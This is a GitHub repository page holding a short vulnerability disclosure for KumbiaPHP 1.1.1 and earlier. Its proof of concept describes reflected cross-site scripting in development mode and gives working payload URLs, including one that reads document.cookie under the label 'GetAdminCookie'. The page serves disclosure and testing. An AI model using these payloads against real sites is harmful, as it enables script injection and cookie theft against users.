Skip to content

jenaye/KumbiaPHP-

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

KumbiaPHP

KumbiaPHP 1.1.1

  • description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser
  • Affected version : All <= 1.1.1

Information

To make this POC, i just install KumbiaPHP by git clone then i used composer and i ran it in WAMP Server

  • Vulnerability Type : Cross Site Scripting (XSS Reflected)

POC

Make sure you are in Development mode, to check it is simple; try to go there : http://kumbiaphp/public/pages/kumbia/status/ replace status by * and you'll see the stacktrace, then replace * by a payload like this /<a%20onmouseover="alert('got%20it')"/>jenaye/</a/>

So your url Your url will look like the following http://kumbiaphp/public/pages/kumbia//%3Ca%20onmouseover=%22alert((document.cookie)%22/%3EGetAdminCookie/%3C/a/%3E/

poc

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published